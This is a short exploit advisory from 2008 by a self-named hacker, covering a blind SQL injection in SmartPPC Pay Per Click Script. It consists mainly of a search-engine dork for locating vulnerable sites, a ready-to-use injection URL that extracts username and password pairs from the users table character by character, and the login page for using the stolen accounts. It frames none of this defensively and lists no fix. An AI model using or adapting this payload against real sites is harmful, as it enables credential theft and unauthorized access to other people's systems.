SmartPPC Pay Per Click Script (idDirectory) Blind SQL Injection Vuln

2008-07-07 00:00:00

+---------------------------------------+
| Blind SQL Injection Vulnerability |
| in Pay Per Click Script |
| found by Hamtaro aka CorVu5 |
|there must be 50 ways to learn to hover|
+---------------------------------------+

#gdork: "Pay Per Click Script powered by SmartPPC.com."

#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108

#login: site.com/accounts.php
---------------------------------------
greetz Hamtaro aka CorVu5

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.